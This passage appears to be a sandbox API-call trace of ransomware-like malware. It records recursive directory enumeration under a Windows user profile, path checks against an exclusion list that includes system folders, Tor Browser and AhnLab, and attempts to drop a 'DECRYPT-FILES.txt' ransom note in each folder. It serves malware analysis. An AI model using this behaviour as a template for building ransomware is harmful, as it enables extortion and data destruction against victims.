(lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.393] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.393] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.393] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="\\All Users") returned 0x0 [0186.393] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.393] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.393] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.393] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="AhnLab") returned 0x0 [0186.393] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.393] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\") returned 78 [0186.393] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.393] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\\\0a16c9.tmp") returned 89 [0186.393] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.394] GetLastError () returned 0x5 [0186.394] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\") returned 78 [0186.394] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.394] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\\\DECRYPT-FILES.txt") returned 96 [0186.394] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.395] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\") returned 78 [0186.395] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*" [0186.395] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*", lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0affc40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0affc40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799b8 [0186.395] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.395] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0affc40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0affc40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.395] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.395] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.395] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0affc40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0affc40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0affc40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.395] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.395] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0affc40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0affc40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0affc40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0186.395] FindClose (in: hFindFile=0x4799b8 | out: hFindFile=0x4799b8) returned 1 [0186.395] CloseHandle (hObject=0xffffffff) returned 0 [0186.395] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0affc40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0affc40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CRLs", cAlternateFileName="")) returned 1 [0186.395] lstrcmpW (lpString1="CRLs", lpString2=".") returned 1 [0186.395] lstrcmpW (lpString1="CRLs", lpString2="..") returned 1 [0186.395] lstrcatW (in: lpString1="CRLs", lpString2="\\" | out: lpString1="CRLs\\") returned="CRLs\\" [0186.395] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2="CRLs\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\" [0186.395] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="\\Program Files") returned 0x0 [0186.395] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch=":\\Windows") returned 0x0 [0186.395] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="\\Games\\") returned 0x0 [0186.395] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.395] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.395] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.395] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.396] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.396] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="\\All Users") returned 0x0 [0186.396] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.396] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.396] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.396] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="AhnLab") returned 0x0 [0186.396] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.396] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\") returned 70 [0186.396] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.396] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\\\0a16c9.tmp") returned 81 [0186.396] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.396] GetLastError () returned 0x5 [0186.396] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\") returned 70 [0186.396] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.396] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\\\DECRYPT-FILES.txt") returned 88 [0186.396] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.396] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\") returned 70 [0186.396] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*" [0186.396] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*", lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0affc40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0affc40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799b8 [0186.396] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.397] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0affc40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0affc40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.397] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.397] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.397] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0affc40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0affc40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0affc40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.397] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.397] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0affc40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0affc40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0affc40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0186.397] FindClose (in: hFindFile=0x4799b8 | out: hFindFile=0x4799b8) returned 1 [0186.397] CloseHandle (hObject=0xffffffff) returned 0 [0186.397] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0affc40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0affc40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CTLs", cAlternateFileName="")) returned 1 [0186.397] lstrcmpW (lpString1="CTLs", lpString2=".") returned 1 [0186.397] lstrcmpW (lpString1="CTLs", lpString2="..") returned 1 [0186.397] lstrcatW (in: lpString1="CTLs", lpString2="\\" | out: lpString1="CTLs\\") returned="CTLs\\" [0186.397] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2="CTLs\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\" [0186.397] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="\\Program Files") returned 0x0 [0186.397] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch=":\\Windows") returned 0x0 [0186.397] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="\\Games\\") returned 0x0 [0186.397] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.397] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.397] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.397] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.397] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.397] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="\\All Users") returned 0x0 [0186.397] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.397] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.397] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.397] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="AhnLab") returned 0x0 [0186.397] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.397] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\") returned 70 [0186.397] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.397] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\\\0a16c9.tmp") returned 81 [0186.398] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.398] GetLastError () returned 0x5 [0186.398] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\") returned 70 [0186.398] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.398] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\\\DECRYPT-FILES.txt") returned 88 [0186.398] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.398] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\") returned 70 [0186.398] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*" [0186.398] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*", lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0affc40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0affc40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799b8 [0186.398] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.398] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0affc40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0affc40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.398] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.398] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.398] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0affc40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0affc40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0affc40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.398] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.398] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0affc40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0affc40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0affc40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0186.398] FindClose (in: hFindFile=0x4799b8 | out: hFindFile=0x4799b8) returned 1 [0186.398] CloseHandle (hObject=0xffffffff) returned 0 [0186.399] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0ad9ae0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0ad9ae0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0affc40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.399] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.399] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0ad9ae0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0ad9ae0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0affc40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0186.399] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0186.399] CloseHandle (hObject=0xffffffff) returned 0 [0186.399] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0affc40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0affc40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My\\", cAlternateFileName="")) returned 0 [0186.399] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0186.399] CloseHandle (hObject=0xffffffff) returned 0 [0186.399] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0b25da0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0b25da0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0186.399] lstrcmpW (lpString1="Windows", lpString2=".") returned 1 [0186.399] lstrcmpW (lpString1="Windows", lpString2="..") returned 1 [0186.399] lstrcatW (in: lpString1="Windows", lpString2="\\" | out: lpString1="Windows\\") returned="Windows\\" [0186.399] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpString2="Windows\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\" [0186.399] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="\\Program Files") returned 0x0 [0186.399] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch=":\\Windows") returned 0x0 [0186.399] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="\\Games\\") returned 0x0 [0186.399] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.399] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", 